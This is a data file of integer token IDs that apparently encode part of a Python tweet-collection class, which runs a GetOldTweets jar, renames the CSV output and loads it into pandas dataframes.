1039,
28,
17821,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
15553,
326,
3848,
20129,
1430,
11629,
9404,
2252,
290,
2252,
198,
220,
220,
220,
220,
220,
220,
220,
736,
287,
640,
1566,
262,
10348,
1271,
286,
12665,
389,
7723,
13,
383,
198,
220,
220,
220,
220,
220,
220,
220,
366,
28446,
1,
11507,
3607,
262,
749,
2274,
3128,
12665,
460,
307,
1043,
422,
11,
198,
220,
220,
220,
220,
220,
220,
220,
290,
262,
2989,
2163,
2499,
19528,
287,
640,
34322,
422,
326,
198,
220,
220,
220,
220,
220,
220,
220,
3128,
1566,
262,
3509,
1271,
286,
12665,
389,
1043,
13,
6660,
1123,
649,
869,
284,
198,
220,
220,
220,
220,
220,
220,
220,
4808,
1136,
62,
505,
62,
12355,
62,
5143,
62,
392,
62,
7783,
62,
12957,
62,
1370,
62,
4475,
481,
923,
262,
2989,
530,
198,
220,
220,
220,
220,
220,
220,
220,
1110,
2252,
287,
262,
1613,
13,
628,
220,
220,
220,
220,
220,
220,
220,
2472,
62,
22510,
62,
83,
732,
1039,
25,
357,
600,
8,
2472,
1271,
286,
12665,
284,
2824,
628,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
525,
62,
5143,
25,
357,
600,
8,
1271,
286,
12665,
287,
869,
284,
20129,
1430,
532,
815,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
407,
307,
625,
2026,
11,
830,
11,
1365,
284,
1394,
1088,
838,
11,
830,
628,
220,
220,
220,
220,
220,
220,
220,
12405,
12947,
25,
357,
8841,
8,
4731,
16215,
12405,
329,
17044,
2989,
532,
766,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6752,
33865,
2438,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
357,
68,
13,
70,
11,
366,
44252,
431,
8015,
1,
329,
2989,
329,
12665,
7268,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
347,
26946,
366,
44252,
431,
1,
290,
366,
5420,
2217,
274,
1,
532,
3058,
5137,
287,
6375,
416,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1021,
857,
407,
7800,
10348,
1255,
11,
523,
734,
4553,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15455,
481,
423,
284,
307,
1760,
329,
366,
1581,
1,
1022,
2456,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2457,
62,
28446,
25,
357,
8841,
8,
3128,
4731,
286,
262,
1296,
705,
4626,
12,
2998,
12,
3132,
6,
326,
3607,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7464,
3128,
326,
12665,
389,
16499,
878,
357,
5661,
318,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
18876,
422,
262,
5609,
366,
28446,
1,
326,
318,
973,
287,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
262,
3848,
284,
4808,
1136,
62,
505,
62,
12355,
62,
5143,
62,
392,
62,
7783,
62,
12957,
62,
1370,
62,
4475,
737,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1002,
1364,
355,
366,
14202,
1,
340,
26235,
284,
262,
1459,
3128,
13,
628,
220,
220,
220,
220,
220,
220,
220,
5072,
62,
43551,
25,
357,
8841,
8,
1438,
286,
9483,
284,
1234,
5072,
287,
628,
220,
220,
220,
220,
220,
220,
220,
22119,
62,
31412,
25,
357,
600,
8,
703,
2952,
284,
2344,
866,
6126,
2989,
611,
8563,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3051,
290,
645,
12665,
389,
1043,
287,
257,
1057,
532,
257,
4054,
1057,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
481,
954,
355,
12665,
62,
525,
62,
5143,
14,
12501,
323,
62,
31412,
12665,
1043,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
523,
262,
2440,
262,
5766,
262,
2392,
262,
1430,
481,
1949,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
284,
2989,
329,
12665,
772,
611,
340,
43609,
4844,
287,
257,
1057,
628,
220,
220,
220,
220,
220,
220,
220,
477,
62,
83,
732,
1039,
25,
357,
30388,
8,
6056,
329,
543,
17379,
284,
779,
532,
6407,
1724,
779,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
477,
62,
83,
732,
1039,
17379,
11,
10352,
1724,
779,
1353,
62,
83,
732,
1039,
17379,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
611,
2457,
62,
28446,
318,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2457,
62,
28446,
796,
965,
7,
19608,
8079,
13,
19608,
8079,
13,
2197,
28955,
58,
25,
940,
60,
628,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
31337,
278,
1600,
965,
7,
23350,
62,
22510,
62,
83,
732,
1039,
828,
366,
83,
732,
1039,
351,
1600,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
965,
7,
83,
732,
1039,
62,
525,
62,
5143,
828,
366,
83,
732,
1039,
583,
1057,
526,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
3109,
35570,
1600,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
965,
7,
600,
7,
344,
346,
7,
23350,
62,
22510,
62,
83,
732,
1039,
14,
22468,
7,
83,
732,
1039,
62,
525,
62,
5143,
22305,
828,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
23350,
4539,
1,
198,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
325,
283,
1740,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
1057,
62,
24588,
796,
352,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
2251,
9483,
326,
12665,
481,
307,
7448,
656,
198,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
28015,
15908,
3256,
5072,
62,
43551,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
1566,
796,
2457,
62,
28446,
628,
220,
220,
220,
220,
220,
220,
220,
981,
12665,
62,
325,
283,
1740,
1279,
2472,
62,
22510,
62,
83,
732,
1039,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
31337,
278,
1057,
1600,
1057,
62,
24588,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1057,
62,
24588,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
869,
20129,
1430,
290,
651,
3128,
286,
938,
6126,
1043,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
938,
62,
4475,
796,
2116,
13557,
1136,
62,
505,
62,
12355,
62,
5143,
62,
392,
62,
7783,
62,
12957,
62,
1370,
62,
4475,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12405,
12947,
11,
1566,
11,
12665,
62,
525,
62,
5143,
11,
477,
62,
83,
732,
1039,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
36265,
1123,
5072,
2393,
290,
1234,
656,
649,
9483,
532,
5072,
2393,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
318,
3706,
416,
1566,
3128,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
649,
62,
7753,
62,
24886,
796,
5072,
62,
43551,
1343,
31051,
6,
1343,
12405,
12947,
1343,
705,
62,
6,
1343,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
1343,
45302,
40664,
6,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
76,
85,
3256,
705,
22915,
62,
23442,
13,
40664,
3256,
649,
62,
7753,
62,
24886,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
611,
938,
62,
4475,
318,
6678,
3128,
5120,
355,
3487,
532,
611,
407,
5298,
4049,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
290,
2245,
2989,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13557,
12102,
378,
62,
4475,
7,
12957,
62,
4475,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
796,
938,
62,
4475,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
325,
283,
1740,
15853,
12665,
62,
525,
62,
5143,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
900,
2989,
3128,
530,
1110,
2252,
287,
1613,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
649,
62,
28446,
62,
4475,
62,
15252,
796,
4818,
8079,
13,
19608,
8079,
13,
2536,
457,
524,
7,
28446,
11,
705,
4,
56,
12,
4,
76,
12,
4,
67,
11537,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
532,
4818,
8079,
13,
16514,
276,
12514,
7,
12545,
28,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
796,
965,
7,
3605,
62,
28446,
62,
4475,
62,
15252,
38381,
25,
940,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
2074,
428,
257,
1178,
12665,
16499,
523,
1430,
1595,
470,
1057,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
8097,
611,
340,
43609,
645,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
325,
283,
1740,
15853,
357,
83,
732,
1039,
62,
525,
62,
5143,
20679,
22468,
7,
12501,
323,
62,
31412,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
7890,
62,
6978,
796,
5072,
62,
43551,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
12947,
62,
38707,
796,
12405,
12947,
13,
35312,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
14957,
640,
284,
2824,
1600,
965,
7,
23350,
62,
22510,
62,
83,
732,
1039,
828,
366,
83,
732,
1039,
25,
1600,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
16,
828,
366,
1084,
1769,
1,
628,
220,
220,
220,
825,
651,
62,
83,
732,
1039,
62,
6738,
62,
29762,
62,
12355,
62,
40664,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
33687,
3108,
284,
17044,
1366,
6492,
351,
20129,
6126,
2989,
5888,
198,
220,
220,
220,
220,
220,
220,
220,
290,
12188,
257,
1366,
14535,
286,
262,
12665,
290,
511,
19249,
198,
220,
220,
220,
220,
220,
220,
220,
1321,
13,
6060,
14535,
468,
15180,
329,
20579,
11,
3128,
11,
1005,
732,
1039,
11,
198,
220,
220,
220,
220,
220,
220,
220,
18852,
11,
2420,
11,
15802,
11,
290,
23950,
13,
383,
1366,
14535,
318,
8574,
739,
198,
220,
220,
220,
220,
220,
220,
220,
262,
11688,
12665,
62,
30094,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
4149,
287,
269,
21370,
2393,
351,
867,
15180,
284,
1848,
329,
661,
508,
1234,
867,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
5026,
27045,
684,
287,
12665,
11,
788,
1394,
691,
262,
15274,
326,
836,
470,
423,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
5026,
27045,
684,
287,
257,
6126,
416,
12047,
15274,
351,
1165,
867,
15180,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
357,
50,
5314,
349,
684,
389,
262,
1619,
16912,
287,
262,
20129,
17044,
2989,
5888,
2014,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
796,
279,
67,
13,
961,
62,
40664,
7,
944,
13,
7890,
62,
6978,
11,
41767,
2625,
26,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3891,
28,
4868,
10786,
39305,
4299,
456,
2926,
41582,
76,
3919,
33809,
21004,
11639,
40477,
12,
23,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
796,
12665,
58,
83,
732,
1039,
13,
74,
13,
271,
8423,
3419,
60,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
7152,
480,
262,
15180,
351,
3376,
14722,
290,
4268,
5752,
326,
318,
655,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
5721,
3891,
357,
5661,
481,
6376,
1366,
14535,
3599,
379,
352,
737,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
13,
28665,
82,
796,
12665,
13,
346,
420,
58,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
13,
14781,
7,
15,
11,
287,
5372,
28,
17821,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
14258,
262,
3131,
15180,
319,
262,
886,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
796,
12665,
58,
14692,
29460,
1600,
366,
4475,
1600,
366,
1186,
732,
1039,
1600,
366,
69,
5570,
2737,
1600,
366,
5239,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
434,
507,
1600,
366,
17831,
31499,
1600,
366,
312,
1600,
366,
525,
31000,
8973,
60,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
13,
9630,
796,
2837,
7,
11925,
7,
83,
732,
1039,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
796,
12665,
628,
220,
220,
220,
825,
651,
62,
12355,
62,
83,
732,
1039,
62,
6738,
62,
40664,
62,
4868,
7,
944,
11,
1351,
62,
1659,
62,
40664,
62,
16624,
28,
14202,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13610,
12665,
62,
7568,
422,
1351,
286,
6126,
269,
21370,
3696,
628,
220,
220,
220,
220,
220,
220,
220,
1351,
62,
1659,
62,
40664,
62,
16624,
25,
21015,
1351,
286,
13532,
357,
1169,
13532,
389,
13042,
8,
284,
269,
21370,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3696,
7268,
12665,
532,
611,
1351,
62,
1659,
62,
40664,
62,
16624,
318,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6045,
788,
262,
3696,
7763,
2641,
2116,
13,
7890,
62,
6978,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
389,
973,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
1351,
62,
1659,
62,
40664,
62,
16624,
318,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1351,
62,
1659,
62,
40664,
62,
16624,
796,
2116,
13557,
1136,
62,
4868,
62,
1659,
62,
40664,
62,
16624,
7,
944,
13,
7890,
62,
6978,
8,
198,
220,
220,
220,
220,
220,
220,
220,
3108,
62,
11600,
796,
23884,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
2251,
22155,
351,
13532,
329,
8251,
290,
11188,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
1366,
14535,
329,
3815,
198,
220,
220,
220,
220,
220,
220,
220,
329,
3108,
287,
1351,
62,
1659,
62,
40664,
62,
16624,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
796,
279,
67,
13,
961,
62,
40664,
7,
6978,
11,
41767,
2625,
26,
1600,
3891,
28,
4868,
10786,
39305,
4299,
456,
2926,
41582,
76,
3919,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
21004,
11639,
40477,
12,
23,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
796,
12665,
58,
83,
732,
1039,
13,
74,
13,
271,
8423,
3419,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
13,
28665,
82,
796,
12665,
13,
346,
420,
58,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
13,
14781,
7,
15,
11,
287,
5372,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
796,
12665,
58,
14692,
29460,
1600,
366,
4475,
1600,
366,
1186,
732,
1039,
1600,
366,
69,
5570,
2737,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
5239,
1600,
366,
434,
507,
1600,
366,
17831,
31499,
1600,
366,
312,
1600,
366,
525,
31000,
8973,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12665,
13,
9630,
796,
2837,
7,
11925,
7,
83,
732,
1039,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3108,
62,
11600,
58,
6978,
60,
796,
12665,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
4654,
477,
2727,
1366,
37805,
1978,
656,
2457,
12665,
62,
7568,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
796,
279,
67,
13,
1102,
9246,
7,
6978,
62,
11600,
13,
27160,
22784,
8856,
62,
9630,
28,
17821,
8,
628,
220,
220,
220,
825,
4808,
1136,
62,
505,
62,
12355,
62,
5143,
62,
392,
62,
7783,
62,
12957,
62,
1370,
62,
4475,
7,
944,
11,
12405,
12947,
11,
1566,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17266,
742,
732,
1039,
11,
477,
62,
83,
732,
1039,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1201,
28,
14202,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
62,
1370,
28,
17821,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13610,
530,
20129,
269,
21370,
1262,
20129,
17379,
357,
31336,
5849,
24205,
1039,
393,
1439,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
355,
7368,
287,
477,
62,
83,
732,
1039,
7621,
8,
290,
1441,
3128,
4731,
422,
938,
6126,
198,
220,
220,
220,
220,
220,
220,
220,
7723,
13,
628,
220,
220,
220,
220,
220,
220,
220,
12405,
12947,
25,
357,
8841,
8,
12405,
4731,
11,
3221,
530,
1573,
532,
3294,
2456,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
20135,
281,
366,
6981,
1,
1022,
606,
198,
220,
220,
220,
220,
220,
220,
220,
17266,
742,
732,
1039,
25,
357,
600,
8,
1271,
286,
12665,
284,
1441,
198,
220,
220,
220,
220,
220,
220,
220,
1201,
25,
357,
8841,
286,
1296,
705,
4626,
12,
2931,
12,
1270,
11537,
4731,
286,
3128,
284,
2989,
1201,
26,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
428,
318,
11902,
290,
1839,
470,
307,
973,
618,
1262,
262,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
12355,
62,
83,
732,
1039,
2163,
198,
220,
220,
220,
220,
220,
220,
220,
1566,
25,
357,
8841,
286,
1296,
705,
4626,
12,
2931,
12,
1270,
11537,
4731,
286,
3128,
284,
2989,
1566,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1201,
2989,
318,
5952,
16196,
287,
640,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
62,
1370,
357,
30388,
2599,
1771,
284,
1441,
3128,
422,
938,
1627,
393,
407,
26,
611,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2081,
262,
3128,
422,
262,
938,
1627,
287,
262,
269,
21370,
318,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4504,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
3853,
543,
17379,
2393,
284,
779,
198,
220,
220,
220,
220,
220,
220,
220,
17379,
62,
8841,
796,
2116,
13,
9491,
62,
43551,
62,
6978,
1343,
31051,
23442,
62,
4852,
62,
83,
732,
1039,
13,
9491,
6,
198,
220,
220,
220,
220,
220,
220,
220,
611,
477,
62,
83,
732,
1039,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17379,
62,
8841,
796,
2116,
13,
9491,
62,
43551,
62,
6978,
1343,
31051,
23442,
62,
439,
62,
83,
732,
1039,
13,
9491,
6,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
2251,
2989,
4731,
198,
220,
220,
220,
220,
220,
220,
220,
35777,
62,
4102,
796,
705,
30543,
198,
220,
220,
220,
220,
220,
220,
220,
12405,
62,
8841,
796,
705,
22766,
12947,
11639,
1343,
35777,
62,
4102,
1343,
12405,
12947,
1343,
35777,
62,
4102,
198,
220,
220,
220,
220,
220,
220,
220,
1566,
62,
8841,
796,
705,
28446,
11639,
1343,
1566,
198,
220,
220,
220,
220,
220,
220,
220,
17266,
742,
732,
1039,
62,
8841,
796,
705,
2611,
742,
732,
1039,
11639,
1343,
965,
7,
2611,
742,
732,
1039,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
2251,
5072,
62,
23442,
13,
40664,
2393,
286,
12665,
351,
777,
2989,
10007,
198,
220,
220,
220,
220,
220,
220,
220,
611,
1201,
318,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
12355,
3256,
705,
12,
9491,
3256,
17379,
62,
8841,
11,
12405,
62,
8841,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1566,
62,
8841,
11,
17266,
742,
732,
1039,
62,
8841,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1201,
62,
8841,
796,
705,
20777,
11639,
1343,
1201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
850,
14681,
13,
13345,
7,
17816,
12355,
3256,
705,
12,
9491,
3256,
17379,
62,
8841,
11,
12405,
62,
8841,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1201,
62,
8841,
11,
1566,
62,
8841,
11,
17266,
742,
732,
1039,
62,
8841,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
1064,
3128,
319,
938,
6126,
287,
428,
2393,
357,
259,
938,
1627,
286,
2393,
8,
198,
220,
220,
220,
220,
220,
220,
220,
938,
62,
1370,
796,
7894,
263,
13,
13199,
7,
9654,
10786,
22915,
62,
23442,
13,
40664,
33809,
352,
38381,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
3128,
62,
9150,
796,
938,
62,
1370,
13,
19796,
10786,
26,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
3128,
62,
8841,
796,
938,
62,
1370,
58,
4475,
62,
9150,
10,
16,
25,
4475,
62,
9150,
10,
1157,
60,
198,
220,
220,
220,
220,
220,
220,
220,
3128,
62,
8841,
796,
2116,
13557,
1102,
1851,
62,
4475,
62,
1462,
62,
20307,
7,
4475,
62,
8841,
8,
628,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
7575,
284,
2824,
1600,
965,
7,
2611,
742,
732,
1039,
828,
366,
83,
732,
1039,
25,
1600,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
352,
828,
366,
1084,
1769,
1,
628,
220,
220,
220,
220,
220,
220,
220,
611,
1441,
62,
1370,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
3128,
62,
8841,
628,
220,
220,
220,
825,
4808,
1136,
62,
4868,
62,
1659,
62,
40664,
62,
16624,
7,
944,
11,
8619,
62,
6978,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
8229,
1351,
286,
269,
21370,
3696,
2641,
257,
8619,
628,
220,
220,
220,
220,
220,
220,
220,
8619,
62,
6978,
25,
357,
8841,
8,
3108,
284,
8619,
4769,
269,
21370,
3696,
286,
198,
220,
220,
220,
220,
220,
220,
220,
1393,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
685,
6978,
22179,
7,
34945,
62,
6978,
11,
277,
8,
329,
277,
287,
1351,
15908,
7,
34945,
62,
6978,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
277,
58,
12,
19,
47715,
6624,
45302,
40664,
20520,
628,
220,
220,
220,
825,
4808,
12102,
378,
62,
4475,
7,
944,
11,
3128,
62,
5239,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
8229,
2081,
611,
3128,
62,
5239,
318,
4731,
286,
1296,
705,
4626,
12,
3312,
12,
1959,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
3991,
4306,
13,
628,
220,
220,
220,
220,
220,
220,
220,
3128,
62,
5239,
357,
8841,
2599,
3128,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4818,
8079,
13,
19608,
8079,
13,
2536,
457,
524,
7,
4475,
62,
5239,
11,
705,
4,
56,
12,
4,
76,
12,
4,
67,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
2845,
11052,
12331,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
